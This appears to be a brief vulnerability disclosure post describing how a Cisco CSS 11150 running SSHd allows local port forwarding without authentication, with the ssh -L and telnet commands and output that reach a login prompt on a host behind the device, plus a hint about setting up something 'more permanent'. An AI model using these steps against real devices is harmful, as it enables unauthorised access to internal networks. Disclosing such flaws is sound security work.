Ok, I will admit, the Cisco CSS 11150 is old (this one was running software
version 07.40.00.04). But, I still think this is useful information; I wasn't able find this particular
bug anywhere. Anyway; the deal is this: If the CSS is running SSHd, it is possible to local (and possibly
remote) port forward without having to authenticate. E.g.:
$ ssh -L 11123:hostonotherside:23 csshost
User Access Verification
Username:
.. will allow the attacker to do:
$ telnet 127.0.0.1 11123
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
login:
And get a login prompt on the host on the other side of the CSS. This was certainly useful in my case. One
caveat: the CSS will time out the ssh login, so you only have a small window to create something more
permanent!